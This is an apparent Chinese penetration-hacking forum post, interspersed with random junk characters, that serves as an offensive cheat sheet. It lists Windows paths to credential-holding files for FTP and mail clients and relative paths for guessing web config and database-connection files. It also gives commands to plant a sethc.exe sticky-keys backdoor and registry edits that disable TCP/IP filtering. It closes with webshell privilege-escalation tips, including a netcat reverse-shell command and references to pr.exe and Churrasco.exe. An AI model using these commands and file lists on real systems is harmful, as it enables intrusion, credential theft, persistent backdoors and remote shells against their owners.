c:\Program Files\Tencent\RTXServer\AppConfig.xml
C:\Program Files\Foxmal\Foxmail.exe
C:\Program Files\Foxmal\accounts.cfg
C:\Program Files\tencent\Foxmal\Foxmail.exe
C:\Program Files\tencent\Foxmal\accounts.cfg
C:\Program Files\LeapFTP 3.0\LeapFTP.exe
C:\Program Files\LeapFTP\LeapFTP.exe
! m5 V: @/ s+ w' f+ Ec:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
C:\Program Files\FlashFXP\FlashFXP.ini
C:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
$ ~7 t2 L0 `! @6 D7 F2 C9 W" Ic:\Program Files\腾讯游戏\QQGAME\readme.txt
+ K7 E/ V! `+ ]* J# \+ A8 Vc:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
* v0 E( B- ^" E7 _. I( S3 ec:\Program Files\tencent\QQGAME\readme.txt
C:\Program Files\StormII\Storm.exe

3.网站相对路径:
+ W- T6 A' |& J
; Y7 k8 P! t5 q; R6 A2 X& s/config.php
../../config.php
../config.php
../../../config.php
4 A; m! i- _, u9 h/ d" c/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
" i' X2 Z) S: d' f2 t/conn.php
0 ]/ H( s% ~' D3 q% l+ j./conn.php
, @! }# h) E; ~3 A8 ?& \: F; w. z% A../../conn.php
4 [% ]8 c6 z# Y* Z* B; I  C- d../conn.php
" h+ M" [/ S8 q6 L  N/ a6 H9 ]../../../conn.php
  @& D1 Y( V) I: i0 a; H6 r' V/conn.asp
4 [4 j* F, k6 S: J./conn.asp
../../conn.asp
../conn.asp
& x& }- w) D$ P- o../../../conn.asp
, v6 D( W- u9 U2 P( F5 `- H/config.inc.php
./config.inc.php
../../config.inc.php
& i  I) g. `" |/ F' Q../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
# M6 V* d; n( ~9 X) |& Q5 A3 v( X/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
9 i3 N9 @  y  a' c6 m1 h0 s, d' _../config/config.inc.php
2 W1 n3 I, i" Z$ z' x$ @6 w$ e../../../config/config.inc.php
/config/conn.php
* G  J) N* Y4 `7 R! x./config/conn.php
: y7 ^$ q5 ~/ k4 O: f../../config/conn.php
../config/conn.php
3 O# [) U' }7 \5 H& M. a. c6 J../../../config/conn.php
& }  K8 }: V+ f3 e) g$ ^/config/conn.asp
./config/conn.asp
( J7 d, g2 M7 y& ?! k4 g0 q../../config/conn.asp
../config/conn.asp
../../../config/conn.asp
3 B4 K5 y; e! U/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
7 o, j, D6 X& M2 i../../../config/config.inc.php
/data/config.php
../../data/config.php
! x# S7 c" e# x3 z3 |/ i../data/config.php
1 e6 h7 h5 m4 j+ F/ P$ ]- G' p../../../data/config.php
/data/config.inc.php
- K. A2 A7 r5 [8 I./data/config.inc.php
../../data/config.inc.php
0 ~1 y9 w: g- |0 _+ G../data/config.inc.php
../../../data/config.inc.php
9 y3 {+ |* p8 e& j& r3 f2 @/data/conn.php
) t3 _4 O* @0 B) ?' `./data/conn.php
6 a# a% T* o( H3 C6 v../../data/conn.php
, b4 V. W  K! W; T- {% l; P( e../data/conn.php
7 ~* @% t+ A/ r* s' l; w../../../data/conn.php
$ H# o" S) ~0 `  Z/data/conn.asp
./data/conn.asp
  C2 j* g0 H/ _; G. p9 I../../data/conn.asp
../data/conn.asp
" p, j, Y  o7 _6 r  i../../../data/conn.asp
/data/config.inc.php
# ?5 _6 L7 r7 |, G& O./data/config.inc.php
9 n  v% p, m( g" N1 P../../data/config.inc.php
( }* x$ w4 w. J../data/config.inc.php
../../../data/config.inc.php
/include/config.php
  ?  \) ^' [, t, r+ E../../include/config.php
- D8 L; a6 J- o& x: q../include/config.php
+ Q$ h2 k- _( k3 R../../../include/config.php
/include/config.inc.php
./include/config.inc.php
' r, L$ c9 j( ~% ^2 m0 O../../include/config.inc.php
../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
1 {- W$ h/ G" }5 Y9 n0 H./include/conn.php
../../include/conn.php
../include/conn.php
../../../include/conn.php
/include/conn.asp
./include/conn.asp
../../include/conn.asp
../include/conn.asp
4 h7 ]1 V+ l& t5 x* G" r3 @4 a../../../include/conn.asp
: C7 n! l6 M1 p4 Y5 t& ]/include/config.inc.php
7 ^/ i7 _7 c* p./include/config.inc.php
$ G8 d4 e: K+ s8 k! V../../include/config.inc.php
& U; a: _$ U2 l% b9 ~4 H0 H: I../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
../../inc/config.php
8 J$ m8 U- E. y3 _* j* S- X../inc/config.php
! a% I, j' @- A  ~5 C0 m! }../../../inc/config.php
0 A1 N3 X5 Q9 z$ p; R! T3 j/inc/config.inc.php
- f/ i9 [- I+ T3 S./inc/config.inc.php
../../inc/config.inc.php
" l. K, X& ^- D3 I6 o../inc/config.inc.php
  f: g- M" |0 {, E0 z../../../inc/config.inc.php
/inc/conn.php
% J. e5 \1 H$ Y./inc/conn.php
, t2 w8 |3 P" [2 R../../inc/conn.php
, u; m, ~# N' y0 }( l* a& L) h. S../inc/conn.php
../../../inc/conn.php
" ?" c" y" y# x& ^/inc/conn.asp
./inc/conn.asp
../../inc/conn.asp
+ Q( {8 a/ k( T/ {* s# f4 w../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
../../inc/config.inc.php
8 Q5 y' X9 E1 H( f2 \' F1 Y../inc/config.inc.php
* K. S# X! w1 _$ p' x5 e../../../inc/config.inc.php
/index.php
./index.php
../../index.php
- s" x) r6 J! _) I0 J../index.php
: B) p" x3 r* o0 Z2 w: W6 [../../../index.php
) B" M) E$ _  C* v1 O/index.asp
2 W) t2 z3 C- q* u8 z& p! I  j./index.asp
* y" N8 g( V+ N# q) Z# l../../index.asp
../index.asp
0 A. e7 q5 w& X6 a7 m../../../index.asp
替换SHIFT后门
5 C  `& s2 L9 C0 `' B+ L# z3 A( u# w　attrib c:\windows\system32\sethc.exe -h -r -s

; K& Q1 F1 O, f! \4 o& r6 J" [/ S　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
5 k6 ?: q- D$ ]* Y
　　del c:\windows\system32\sethc.exe
! Y9 O4 q9 V" @) l' e; C
　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

( `: N7 i- ^: m6 ~: h　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

! w/ f# h5 {0 E) |　　attrib c:\windows\system32\sethc.exe +h +r +s

　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
; b0 ^* L' C6 c9 }8 m去除TCPIP筛选
7 _$ K. t5 v8 ~! E* q4 g" [6 E& B8 rTCP/IP筛选在注册表里有三处，分别是：
( ]7 t9 |; \) n8 j% f9 ~7 {HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
9 g' G# w  [+ X6 D- ~) FHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 O& v8 m9 d; F) \4 \4 ?! H7 s: e, n" WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用
$ R+ r+ ?4 a$ b- x% G/ R5 K- \regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- u' A4 V$ F' P$ G1 X: Mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% Z( u+ @4 p9 {  q; Y& H$ h) @/ }regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& y7 k% z/ Y3 n7 f8 f命令来导出注册表项
  ]7 _0 i! C3 {' Y; p* z2 Y7 J( f
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000
1 y& |; Z3 A5 H4 f" V
再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可

4 y8 W( r6 G3 w* }  o) k9 nwebshell提权小技巧
cmd路径:
7 f; m5 u* h. H' j% hc:\windows\temp\cmd.exe
nc也在同目录下
例如反弹cmdshell：
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
' h! Z! {- i# S' Y( y# D通常都不会成功。

0 t0 c; s8 {* T5 N而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
. X$ u+ A$ U4 s7 G4 ^命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
$ q/ y+ m4 m/ l: w却能成功。。
. R/ |& E% V1 \) }' W% p# {6 \这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2